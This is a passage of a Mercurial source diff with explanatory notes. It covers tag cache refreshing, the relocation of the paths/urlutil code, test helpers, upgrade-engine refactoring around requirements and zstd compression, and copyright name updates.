mctx = ctx.manifestctx()
fnode = mctx.readfast().get(b'.hgtags')
if fnode is None:
@@ -800,8 +827,6 @@
except error.LookupError:
# No .hgtags file on this revision.
fnode = nullid
-
- self._writeentry(offset, properprefix, fnode)
return fnode
def setfnode(self, node, fnode):
@@ -815,6 +840,21 @@
self._writeentry(ctx.rev() * _fnodesrecsize, node[0:4], fnode)
+ def refresh_invalid_nodes(self, nodes):
+ """recomputes file nodes for a given set of nodes which has unknown
+ filenodes for them in the cache
+ Also updates the in-memory cache with the correct filenode.
+ Caller needs to take care about calling `.write()` so that updates are
+ persisted.
+ Returns a map {node: recomputed fnode}
+ """
+ fixed_nodemap = {}
+ for node in nodes:
+ fnode = self._computefnode(node)
+ fixed_nodemap[node] = fnode
+ self.setfnode(node, fnode)
+ return fixed_nodemap
+
def _writeentry(self, offset, prefix, fnode):
# Slices on array instances only accept other array.
entry = bytearray(prefix + fnode)
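
The record layout implied by _writeentry() and the node[0:4] prefix above
(a sketch, not part of the patch):

    <4 bytes: changelog node prefix><20 bytes: .hgtags filenode>

i.e. one fixed-size 24-byte record per changelog revision, addressed at
rev * _fnodesrecsize.
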
--- a/mercurial/templatefilters.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templatefilters.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templatefilters.py - common template expansion filters
#
-# Copyright 2005-2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/templatefuncs.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templatefuncs.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templatefuncs.py - common template functions
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/templatekw.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templatekw.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templatekw.py - common changeset template keywords
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/templater.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templater.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templater.py - template expansion for output
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -891,7 +891,7 @@
fp = _open_mapfile(path)
cache, tmap, aliases = _readmapfile(fp, path)
- for key, val in conf[b'templates'].items():
+ for key, val in conf.items(b'templates'):
if not val:
raise error.ParseError(
_(b'missing value'), conf.source(b'templates', key)
@@ -904,7 +904,7 @@
cache[key] = unquotestring(val)
elif key != b'__base__':
tmap[key] = os.path.join(base, val)
- aliases.extend(conf[b'templatealias'].items())
+ aliases.extend(conf.items(b'templatealias'))
return cache, tmap, aliases
--- a/mercurial/templateutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templateutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templateutil.py - utility for template evaluation
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/testing/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/testing/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,35 @@
+from __future__ import (
+ absolute_import,
+ division,
+)
+
+import os
+import time
+
+
+# work around check-code complaints
+#
+# This is a simple low-level module doing simple test-related work; we can't
+# import more things, and we do not need to.
+environ = getattr(os, 'environ')
+
+
+def _timeout_factor():
+ """return the current modification to timeout"""
+ default = int(environ.get('HGTEST_TIMEOUT_DEFAULT', 1))
+ current = int(environ.get('HGTEST_TIMEOUT', default))
+ return current / float(default)
+
+
+def wait_file(path, timeout=10):
+ timeout *= _timeout_factor()
+ start = time.time()
+ while not os.path.exists(path):
+ if time.time() - start > timeout:
+ raise RuntimeError(b"timed out waiting for file: %s" % path)
+ time.sleep(0.01)
+
+
+def write_file(path, content=b''):
+ with open(path, 'wb') as f:
+ f.write(content)
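
A usage sketch for the new helpers (illustrative): two test processes can
synchronise on the filesystem, with the timeout scaled by HGTEST_TIMEOUT:

    from mercurial import testing

    # in one process:
    testing.write_file('sync-point', b'ready')

    # in the other:
    testing.wait_file('sync-point', timeout=10)
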
--- a/mercurial/testing/storage.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/testing/storage.py Tue Apr 20 11:01:06 2021 -0400
@@ -1129,12 +1129,13 @@
with self._maketransactionfn() as tr:
nodes = []
- def onchangeset(cl, node):
+ def onchangeset(cl, rev):
+ node = cl.node(rev)
nodes.append(node)
cb(cl, node)
- def ondupchangeset(cl, node):
- nodes.append(node)
+ def ondupchangeset(cl, rev):
+ nodes.append(cl.node(rev))
f.addgroup(
[],
@@ -1157,18 +1158,19 @@
f = self._makefilefn()
deltas = [
- (node0, nullid, nullid, nullid, nullid, delta0, 0),
+ (node0, nullid, nullid, nullid, nullid, delta0, 0, {}),
]
with self._maketransactionfn() as tr:
nodes = []
- def onchangeset(cl, node):
+ def onchangeset(cl, rev):
+ node = cl.node(rev)
nodes.append(node)
cb(cl, node)
- def ondupchangeset(cl, node):
- nodes.append(node)
+ def ondupchangeset(cl, rev):
+ nodes.append(cl.node(rev))
f.addgroup(
deltas,
@@ -1212,13 +1214,15 @@
for i, fulltext in enumerate(fulltexts):
delta = mdiff.trivialdiffheader(len(fulltext)) + fulltext
- deltas.append((nodes[i], nullid, nullid, nullid, nullid, delta, 0))
+ deltas.append(
+ (nodes[i], nullid, nullid, nullid, nullid, delta, 0, {})
+ )
with self._maketransactionfn() as tr:
newnodes = []
- def onchangeset(cl, node):
- newnodes.append(node)
+ def onchangeset(cl, rev):
+ newnodes.append(cl.node(rev))
f.addgroup(
deltas,
@@ -1260,7 +1264,9 @@
)
delta = mdiff.textdiff(b'bar\n' * 30, (b'bar\n' * 30) + b'baz\n')
- deltas = [(b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0)]
+ deltas = [
+ (b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0, {})
+ ]
with self._maketransactionfn() as tr:
with self.assertRaises(error.CensoredBaseError):
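
Two interface changes drive the test updates above: the addgroup callbacks
now receive a revision number instead of a node (hence the cl.node(rev)
calls), and each delta tuple gains an eighth element, the sidedata mapping
({} when empty).
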
--- a/mercurial/transaction.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/transaction.py Tue Apr 20 11:01:06 2021 -0400
@@ -6,7 +6,7 @@
# effectively log-structured, this should amount to simply truncating
# anything that isn't referenced in the changelog.
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/treediscovery.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/treediscovery.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# discovery.py - protocol changeset discovery functions
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/ui.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/ui.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# ui.py - user interface bits for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -26,7 +26,6 @@
from .pycompat import (
getattr,
open,
- setattr,
)
from . import (
@@ -48,6 +47,7 @@
procutil,
resourceutil,
stringutil,
+ urlutil,
)
urlreq = util.urlreq
@@ -302,6 +302,11 @@
if k in self.environ:
self._exportableenviron[k] = self.environ[k]
+ def _new_source(self):
+ self._ocfg.new_source()
+ self._tcfg.new_source()
+ self._ucfg.new_source()
+
@classmethod
def load(cls):
"""Create a ui and load global and user configs"""
@@ -313,6 +318,7 @@
elif t == b'resource':
u.read_resource_config(f, trust=True)
elif t == b'items':
+ u._new_source()
sections = set()
for section, name, value, source in f:
# do not set u._ocfg
@@ -325,6 +331,7 @@
else:
raise error.ProgrammingError(b'unknown rctype: %s' % t)
u._maybetweakdefaults()
+ u._new_source() # anything after that is a different level
return u
def _maybetweakdefaults(self):
@@ -552,9 +559,9 @@
)
p = p.replace(b'%%', b'%')
p = util.expandpath(p)
- if not util.hasscheme(p) and not os.path.isabs(p):
+ if not urlutil.hasscheme(p) and not os.path.isabs(p):
p = os.path.normpath(os.path.join(root, p))
- c.set(b"paths", n, p)
+ c.alter(b"paths", n, p)
if section in (None, b'ui'):
# update ui options
@@ -655,11 +662,18 @@
msg %= (section, name, pycompat.bytestr(default))
self.develwarn(msg, 2, b'warn-config-default')
+ candidates = []
+ config = self._data(untrusted)
for s, n in alternates:
- candidate = self._data(untrusted).get(s, n, None)
+ candidate = config.get(s, n, None)
if candidate is not None:
- value = candidate
- break
+ candidates.append((s, n, candidate))
+ if candidates:
+
+ def level(x):
+ return config.level(x[0], x[1])
+
+ value = max(candidates, key=level)[2]
if self.debugflag and not untrusted and self._reportuntrusted:
for s, n in alternates:
@@ -1016,8 +1030,10 @@
def expandpath(self, loc, default=None):
"""Return repository location relative to cwd or from [paths]"""
+ msg = b'ui.expandpath is deprecated, use `get_*` functions from urlutil'
+ self.deprecwarn(msg, b'6.0')
try:
- p = self.paths.getpath(loc)
+ p = self.getpath(loc)
if p:
return p.rawloc
except error.RepoError:
@@ -1025,7 +1041,7 @@
if default:
try:
- p = self.paths.getpath(default)
+ p = self.getpath(default)
if p:
return p.rawloc
except error.RepoError:
@@ -1035,7 +1051,14 @@
@util.propertycache
def paths(self):
- return paths(self)
+ return urlutil.paths(self)
+
+ def getpath(self, *args, **kwargs):
+ """see paths.getpath for details
+
+ This method exists because `getpath` needs a ui for potential warning
+ messages.
+ """
+ return self.paths.getpath(self, *args, **kwargs)
@property
def fout(self):
@@ -2159,192 +2182,6 @@
return util._estimatememory()
-class paths(dict):
- """Represents a collection of paths and their configs.
-
- Data is initially derived from ui instances and the config files they have
- loaded.
- """
-
- def __init__(self, ui):
- dict.__init__(self)
-
- for name, loc in ui.configitems(b'paths', ignoresub=True):
- # No location is the same as not existing.
- if not loc:
- continue
- loc, sub = ui.configsuboptions(b'paths', name)
- self[name] = path(ui, name, rawloc=loc, suboptions=sub)
-
- def getpath(self, name, default=None):
- """Return a ``path`` from a string, falling back to default.
-
- ``name`` can be a named path or locations. Locations are filesystem
- paths or URIs.
-
- Returns None if ``name`` is not a registered path, a URI, or a local
- path to a repo.
- """
- # Only fall back to default if no path was requested.
- if name is None:
- if not default:
- default = ()
- elif not isinstance(default, (tuple, list)):
- default = (default,)
- for k in default:
- try:
- return self[k]
- except KeyError:
- continue
- return None
-
- # Most likely empty string.
- # This may need to raise in the future.
- if not name:
- return None
-
- try:
- return self[name]
- except KeyError:
- # Try to resolve as a local path or URI.
- try:
- # We don't pass sub-options in, so no need to pass ui instance.
- return path(None, None, rawloc=name)
- except ValueError:
- raise error.RepoError(_(b'repository %s does not exist') % name)
-
-
-_pathsuboptions = {}
-
-
-def pathsuboption(option, attr):
- """Decorator used to declare a path sub-option.
-
- Arguments are the sub-option name and the attribute it should set on
- ``path`` instances.
-
- The decorated function will receive as arguments a ``ui`` instance,
- ``path`` instance, and the string value of this option from the config.
- The function should return the value that will be set on the ``path``
- instance.
-
- This decorator can be used to perform additional verification of
- sub-options and to change the type of sub-options.
- """
-
- def register(func):
- _pathsuboptions[option] = (attr, func)
- return func
-
- return register
-
-
-@pathsuboption(b'pushurl', b'pushloc')
-def pushurlpathoption(ui, path, value):
- u = util.url(value)
- # Actually require a URL.
- if not u.scheme:
- ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
- return None
-
- # Don't support the #foo syntax in the push URL to declare branch to
- # push.
- if u.fragment:
- ui.warn(
- _(
- b'("#fragment" in paths.%s:pushurl not supported; '
- b'ignoring)\n'
- )
- % path.name
- )
- u.fragment = None
-
- return bytes(u)
-
-
-@pathsuboption(b'pushrev', b'pushrev')
-def pushrevpathoption(ui, path, value):
- return value
-
-
-class path(object):
- """Represents an individual path and its configuration."""
-
- def __init__(self, ui, name, rawloc=None, suboptions=None):
- """Construct a path from its config options.
-
- ``ui`` is the ``ui`` instance the path is coming from.
- ``name`` is the symbolic name of the path.
- ``rawloc`` is the raw location, as defined in the config.
- ``pushloc`` is the raw locations pushes should be made to.
-
- If ``name`` is not defined, we require that the location be a) a local
- filesystem path with a .hg directory or b) a URL. If not,
- ``ValueError`` is raised.
- """
- if not rawloc:
- raise ValueError(b'rawloc must be defined')
-
- # Locations may define branches via syntax <base>#<branch>.
- u = util.url(rawloc)
- branch = None
- if u.fragment:
- branch = u.fragment
- u.fragment = None
-
- self.url = u
- self.branch = branch
-
- self.name = name
- self.rawloc = rawloc
- self.loc = b'%s' % u
-
- # When given a raw location but not a symbolic name, validate the
- # location is valid.
- if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
- raise ValueError(
- b'location is not a URL or path to a local '
- b'repo: %s' % rawloc
- )
-
- suboptions = suboptions or {}
-
- # Now process the sub-options. If a sub-option is registered, its
- # attribute will always be present. The value will be None if there
- # was no valid sub-option.
- for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
- if suboption not in suboptions:
- setattr(self, attr, None)
- continue
-
- value = func(ui, self, suboptions[suboption])
- setattr(self, attr, value)
-
- def _isvalidlocalpath(self, path):
- """Returns True if the given path is a potentially valid repository.
- This is its own function so that extensions can change the definition of
- 'valid' in this case (like when pulling from a git repo into a hg
- one)."""
- try:
- return os.path.isdir(os.path.join(path, b'.hg'))
- # Python 2 may return TypeError. Python 3, ValueError.
- except (TypeError, ValueError):
- return False
-
- @property
- def suboptions(self):
- """Return sub-options and their values for this path.
-
- This is intended to be used for presentation purposes.
- """
- d = {}
- for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
- value = getattr(self, attr)
- if value is not None:
- d[subopt] = value
- return d
-
-
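
The sub-option machinery removed here now lives in
`mercurial.utils.urlutil`; a hedged sketch of how an extension would
register a custom sub-option against the new location (the option name is
made up):

    from mercurial.utils import urlutil

    @urlutil.pathsuboption(b'myext-flag', b'myext_flag')
    def myextflagoption(ui, path, value):
        # The returned value becomes `path.myext_flag`; None means unset.
        return value or None
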
# we instantiate one globally shared progress bar to avoid
# competing progress bars when multiple UI objects get created
_progresssingleton = None
--- a/mercurial/unionrepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/unionrepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -128,6 +128,7 @@
deltas,
linkmapper,
transaction,
+ alwayscache=False,
addrevisioncb=None,
duplicaterevisioncb=None,
maybemissingparents=False,
@@ -152,9 +153,9 @@
class unionmanifest(unionrevlog, manifest.manifestrevlog):
- def __init__(self, opener, opener2, linkmapper):
- manifest.manifestrevlog.__init__(self, opener)
- manifest2 = manifest.manifestrevlog(opener2)
+ def __init__(self, nodeconstants, opener, opener2, linkmapper):
+ manifest.manifestrevlog.__init__(self, nodeconstants, opener)
+ manifest2 = manifest.manifestrevlog(nodeconstants, opener2)
unionrevlog.__init__(
self, opener, self.indexfile, manifest2, linkmapper
)
@@ -204,7 +205,10 @@
@localrepo.unfilteredpropertycache
def manifestlog(self):
rootstore = unionmanifest(
- self.svfs, self.repo2.svfs, self.unfiltered()._clrev
+ self.nodeconstants,
+ self.svfs,
+ self.repo2.svfs,
+ self.unfiltered()._clrev,
)
return manifest.manifestlog(
self.svfs, self, rootstore, self.narrowmatch()
--- a/mercurial/upgrade.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/upgrade.py Tue Apr 20 11:01:06 2021 -0400
@@ -118,6 +118,7 @@
up_actions,
removed_actions,
revlogs,
+ backup,
)
if not run:
@@ -215,12 +216,6 @@
backuppath = upgrade_engine.upgrade(
ui, repo, dstrepo, upgrade_op
)
- if not backup:
- ui.status(
- _(b'removing old repository content %s\n') % backuppath
- )
- repo.vfs.rmtree(backuppath, forcibly=True)
- backuppath = None
finally:
ui.status(_(b'removing temporary repository %s\n') % tmppath)
--- a/mercurial/upgrade_utils/actions.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/upgrade_utils/actions.py Tue Apr 20 11:01:06 2021 -0400
@@ -23,7 +23,7 @@
# list of requirements that request a clone of all revlog if added/removed
RECLONES_REQUIREMENTS = {
- b'generaldelta',
+ requirements.GENERALDELTA_REQUIREMENT,
requirements.SPARSEREVLOG_REQUIREMENT,
}
@@ -69,6 +69,18 @@
postdowngrademessage
Message intended for humans which will be shown post an upgrade
operation in which this improvement was removed
+
+ touches_filelogs (bool)
+ Whether this improvement touches filelogs
+
+ touches_manifests (bool)
+ Whether this improvement touches manifests
+
+ touches_changelog (bool)
+ Whether this improvement touches changelog
+
+ touches_requirements (bool)
+ Whether this improvement changes repository requirements
"""
def __init__(self, name, type, description, upgrademessage):
@@ -78,6 +90,12 @@
self.upgrademessage = upgrademessage
self.postupgrademessage = None
self.postdowngrademessage = None
+ # By default for now, we assume every improvement touches
+ # all the things
+ self.touches_filelogs = True
+ self.touches_manifests = True
+ self.touches_changelog = True
+ self.touches_requirements = True
def __eq__(self, other):
if not isinstance(other, improvement):
@@ -131,6 +149,12 @@
# operation in which this improvement was removed
postdowngrademessage = None
+ # By default for now, we assume every improvement touches all the things
+ touches_filelogs = True
+ touches_manifests = True
+ touches_changelog = True
+ touches_requirements = True
+
def __init__(self):
raise NotImplementedError()
@@ -176,7 +200,7 @@
class fncache(requirementformatvariant):
name = b'fncache'
- _requirement = b'fncache'
+ _requirement = requirements.FNCACHE_REQUIREMENT
default = True
@@ -196,7 +220,7 @@
class dotencode(requirementformatvariant):
name = b'dotencode'
- _requirement = b'dotencode'
+ _requirement = requirements.DOTENCODE_REQUIREMENT
default = True
@@ -215,7 +239,7 @@
class generaldelta(requirementformatvariant):
name = b'generaldelta'
- _requirement = b'generaldelta'
+ _requirement = requirements.GENERALDELTA_REQUIREMENT
default = True
@@ -270,6 +294,12 @@
b' New shares will be created in safe mode.'
)
+ # upgrade only needs to change the requirements
+ touches_filelogs = False
+ touches_manifests = False
+ touches_changelog = False
+ touches_requirements = True
+
@registerformatvariant
class sparserevlog(requirementformatvariant):
@@ -298,22 +328,6 @@
@registerformatvariant
-class sidedata(requirementformatvariant):
- name = b'sidedata'
-
- _requirement = requirements.SIDEDATA_REQUIREMENT
-
- default = False
-
- description = _(
- b'Allows storage of extra data alongside a revision, '
- b'unlocking various caching options.'
- )
-
- upgrademessage = _(b'Allows storage of extra data alongside a revision.')
-
-
-@registerformatvariant
class persistentnodemap(requirementformatvariant):
name = b'persistent-nodemap'
@@ -344,6 +358,15 @@
@registerformatvariant
+class revlogv2(requirementformatvariant):
+ name = b'revlog-v2'
+ _requirement = requirements.REVLOGV2_REQUIREMENT
+ default = False
+ description = _(b'Version 2 of the revlog.')
+ upgrademessage = _(b'very experimental')
+
+
+@registerformatvariant
class removecldeltachain(formatvariant):
name = b'plain-cl-delta'
@@ -375,10 +398,21 @@
return True
+_has_zstd = (
+ b'zstd' in util.compengines
+ and util.compengines[b'zstd'].available()
+ and util.compengines[b'zstd'].revlogheader()
+)
+
+
@registerformatvariant
class compressionengine(formatvariant):
name = b'compression'
- default = b'zlib'
+
+ if _has_zstd:
+ default = b'zstd'
+ else:
+ default = b'zlib'
description = _(
b'Compression algorithm used to compress data. '
@@ -408,7 +442,9 @@
# return the first valid value as the selection code would do
for comp in compengines:
if comp in util.compengines:
- return comp
+ e = util.compengines[comp]
+ if e.available() and e.revlogheader():
+ return comp
# no valid compression found; let's display them all for clarity
return b','.join(compengines)
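
The `_has_zstd` probe above is what gates the new default; the same three
checks can pick an engine at runtime, as in this sketch:

    from mercurial import util

    def best_revlog_compression():
        # An engine must be compiled in, loadable, and able to emit a
        # revlog header before it can be used for revlogs.
        if (
            b'zstd' in util.compengines
            and util.compengines[b'zstd'].available()
            and util.compengines[b'zstd'].revlogheader()
        ):
            return b'zstd'
        return b'zlib'
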
@@ -629,6 +665,7 @@
upgrade_actions,
removed_actions,
revlogs_to_process,
+ backup_store,
):
self.ui = ui
self.new_requirements = new_requirements
@@ -673,6 +710,75 @@
b're-delta-multibase' in self._upgrade_actions_names
)
+ # should this operation create a backup of the store
+ self.backup_store = backup_store
+
+ # whether the operation touches different revlogs at all or not
+ self.touches_filelogs = self._touches_filelogs()
+ self.touches_manifests = self._touches_manifests()
+ self.touches_changelog = self._touches_changelog()
+ # whether the operation touches requirements file or not
+ self.touches_requirements = self._touches_requirements()
+ self.touches_store = (
+ self.touches_filelogs
+ or self.touches_manifests
+ or self.touches_changelog
+ )
+        # does the operation only touch the repository requirements
+ self.requirements_only = (
+ self.touches_requirements and not self.touches_store
+ )
+
+ def _touches_filelogs(self):
+ for a in self.upgrade_actions:
+ # in optimisations, we re-process the revlogs again
+ if a.type == OPTIMISATION:
+ return True
+ elif a.touches_filelogs:
+ return True
+ for a in self.removed_actions:
+ if a.touches_filelogs:
+ return True
+ return False
+
+ def _touches_manifests(self):
+ for a in self.upgrade_actions:
+ # in optimisations, we re-process the revlogs again
+ if a.type == OPTIMISATION:
+ return True
+ elif a.touches_manifests:
+ return True
+ for a in self.removed_actions:
+ if a.touches_manifests:
+ return True
+ return False
+
+ def _touches_changelog(self):
+ for a in self.upgrade_actions:
+ # in optimisations, we re-process the revlogs again
+ if a.type == OPTIMISATION:
+ return True
+ elif a.touches_changelog:
+ return True
+ for a in self.removed_actions:
+ if a.touches_changelog:
+ return True
+ return False
+
+ def _touches_requirements(self):
+ for a in self.upgrade_actions:
+            # optimisations are used to re-process revlogs and do not result
+ # in a requirement being added or removed
+ if a.type == OPTIMISATION:
+ pass
+ elif a.touches_requirements:
+ return True
+ for a in self.removed_actions:
+ if a.touches_requirements:
+ return True
+
+ return False
+
def _write_labeled(self, l, label):
"""
Utility function to aid writing of a list under one label
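
Taken together, the `_touches_*` probes answer one question: can the
upgrade skip cloning revlogs entirely? A toy model of the computation, with
stand-in action objects:

    OPTIMISATION = 'optimization'

    class Action(object):
        # Stand-in for an improvement; defaults mirror the conservative
        # "touches everything" assumption above.
        def __init__(self, type, requirements_only=False):
            self.type = type
            self.touches_filelogs = not requirements_only
            self.touches_manifests = not requirements_only
            self.touches_changelog = not requirements_only
            self.touches_requirements = True

    actions = [Action('format', requirements_only=True)]  # e.g. share-safe
    touches_store = any(
        a.type == OPTIMISATION
        or a.touches_filelogs
        or a.touches_manifests
        or a.touches_changelog
        for a in actions
    )
    requirements_only = (
        any(a.touches_requirements for a in actions) and not touches_store
    )
    assert requirements_only  # the revlog clone can be skipped
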
@@ -760,9 +866,7 @@
"""
return {
# Introduced in Mercurial 0.9.2.
- b'revlogv1',
- # Introduced in Mercurial 0.9.2.
- b'store',
+ requirements.STORE_REQUIREMENT,
}
@@ -784,9 +888,21 @@
}
+def check_revlog_version(reqs):
+ """Check that the requirements contain at least one Revlog version"""
+ all_revlogs = {
+ requirements.REVLOGV1_REQUIREMENT,
+ requirements.REVLOGV2_REQUIREMENT,
+ }
+ if not all_revlogs.intersection(reqs):
+ msg = _(b'cannot upgrade repository; missing a revlog version')
+ raise error.Abort(msg)
+
+
def check_source_requirements(repo):
"""Ensure that no existing requirements prevent the repository upgrade"""
+ check_revlog_version(repo.requirements)
required = requiredsourcerequirements(repo)
missingreqs = required - repo.requirements
if missingreqs:
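
`check_revlog_version` is a plain set-intersection guard; the same shape in
isolation (the v2 requirement string is illustrative):

    def has_revlog_version(reqs):
        # At least one revlog version requirement must be present.
        all_revlogs = {b'revlogv1', b'exp-revlogv2.1'}
        return bool(all_revlogs & set(reqs))

    assert has_revlog_version({b'revlogv1', b'store', b'fncache'})
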
@@ -818,6 +934,8 @@
requirements.COPIESSDC_REQUIREMENT,
requirements.NODEMAP_REQUIREMENT,
requirements.SHARESAFE_REQUIREMENT,
+ requirements.REVLOGV2_REQUIREMENT,
+ requirements.REVLOGV1_REQUIREMENT,
}
for name in compression.compengines:
engine = compression.compengines[name]
@@ -837,16 +955,17 @@
Extensions should monkeypatch this to add their custom requirements.
"""
supported = {
- b'dotencode',
- b'fncache',
- b'generaldelta',
- b'revlogv1',
- b'store',
+ requirements.DOTENCODE_REQUIREMENT,
+ requirements.FNCACHE_REQUIREMENT,
+ requirements.GENERALDELTA_REQUIREMENT,
+ requirements.REVLOGV1_REQUIREMENT, # allowed in case of downgrade
+ requirements.STORE_REQUIREMENT,
requirements.SPARSEREVLOG_REQUIREMENT,
requirements.SIDEDATA_REQUIREMENT,
requirements.COPIESSDC_REQUIREMENT,
requirements.NODEMAP_REQUIREMENT,
requirements.SHARESAFE_REQUIREMENT,
+ requirements.REVLOGV2_REQUIREMENT,
}
for name in compression.compengines:
engine = compression.compengines[name]
@@ -868,14 +987,16 @@
future, unknown requirements from accidentally being added.
"""
supported = {
- b'dotencode',
- b'fncache',
- b'generaldelta',
+ requirements.DOTENCODE_REQUIREMENT,
+ requirements.FNCACHE_REQUIREMENT,
+ requirements.GENERALDELTA_REQUIREMENT,
requirements.SPARSEREVLOG_REQUIREMENT,
requirements.SIDEDATA_REQUIREMENT,
requirements.COPIESSDC_REQUIREMENT,
requirements.NODEMAP_REQUIREMENT,
requirements.SHARESAFE_REQUIREMENT,
+ requirements.REVLOGV1_REQUIREMENT,
+ requirements.REVLOGV2_REQUIREMENT,
}
for name in compression.compengines:
engine = compression.compengines[name]
@@ -888,7 +1009,7 @@
def check_requirements_changes(repo, new_reqs):
old_reqs = repo.requirements
-
+ check_revlog_version(repo.requirements)
support_removal = supportremovedrequirements(repo)
no_remove_reqs = old_reqs - new_reqs - support_removal
if no_remove_reqs:
--- a/mercurial/upgrade_utils/engine.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/upgrade_utils/engine.py Tue Apr 20 11:01:06 2021 -0400
@@ -21,27 +21,34 @@
requirements,
revlog,
scmutil,
+ store,
util,
vfs as vfsmod,
)
+from ..revlogutils import nodemap
-def _revlogfrompath(repo, path):
+def _revlogfrompath(repo, rl_type, path):
"""Obtain a revlog from a repo path.
An instance of the appropriate class is returned.
"""
- if path == b'00changelog.i':
+ if rl_type & store.FILEFLAGS_CHANGELOG:
return changelog.changelog(repo.svfs)
- elif path.endswith(b'00manifest.i'):
- mandir = path[: -len(b'00manifest.i')]
- return manifest.manifestrevlog(repo.svfs, tree=mandir)
+ elif rl_type & store.FILEFLAGS_MANIFESTLOG:
+ mandir = b''
+ if b'/' in path:
+ mandir = path.rsplit(b'/', 1)[0]
+ return manifest.manifestrevlog(
+ repo.nodeconstants, repo.svfs, tree=mandir
+ )
else:
- # reverse of "/".join(("data", path + ".i"))
- return filelog.filelog(repo.svfs, path[5:-2])
+ # drop the extension and the `data/` prefix
+ path = path.rsplit(b'.', 1)[0].split(b'/', 1)[1]
+ return filelog.filelog(repo.svfs, path)
-def _copyrevlog(tr, destrepo, oldrl, unencodedname):
+def _copyrevlog(tr, destrepo, oldrl, rl_type, unencodedname):
"""copy all relevant files for `oldrl` into `destrepo` store
Files are copied "as is" without any transformation. The copy is performed
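
Revlog classification now keys off `store` file flags instead of path
suffixes; a simplified model of the bit-flag dispatch (the flag values here
are illustrative, not Mercurial's actual constants):

    FILEFLAGS_CHANGELOG = 1 << 0
    FILEFLAGS_MANIFESTLOG = 1 << 1
    FILEFLAGS_FILELOG = 1 << 2
    FILEFLAGS_REVLOG_MAIN = 1 << 3  # the ".i" half of a revlog

    def classify(rl_type):
        if rl_type & FILEFLAGS_CHANGELOG:
            return 'changelog'
        elif rl_type & FILEFLAGS_MANIFESTLOG:
            return 'manifest'
        assert rl_type & FILEFLAGS_FILELOG
        return 'filelog'

    assert classify(FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN) == 'changelog'
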
@@ -49,7 +56,7 @@
content is compatible with format of the destination repository.
"""
oldrl = getattr(oldrl, '_revlog', oldrl)
- newrl = _revlogfrompath(destrepo, unencodedname)
+ newrl = _revlogfrompath(destrepo, rl_type, unencodedname)
newrl = getattr(newrl, '_revlog', newrl)
oldvfs = oldrl.opener
@@ -67,10 +74,7 @@
if copydata:
util.copyfile(olddata, newdata)
- if not (
- unencodedname.endswith(b'00changelog.i')
- or unencodedname.endswith(b'00manifest.i')
- ):
+ if rl_type & store.FILEFLAGS_FILELOG:
destrepo.svfs.fncache.add(unencodedname)
if copydata:
destrepo.svfs.fncache.add(unencodedname[:-2] + b'.d')
@@ -104,17 +108,18 @@
return sidedatacompanion
-def matchrevlog(revlogfilter, entry):
+def matchrevlog(revlogfilter, rl_type):
"""check if a revlog is selected for cloning.
In other words, does the revlog need any updates, or can it be
blindly copied?
The store entry is checked against the passed filter"""
- if entry.endswith(b'00changelog.i'):
+ if rl_type & store.FILEFLAGS_CHANGELOG:
return UPGRADE_CHANGELOG in revlogfilter
- elif entry.endswith(b'00manifest.i'):
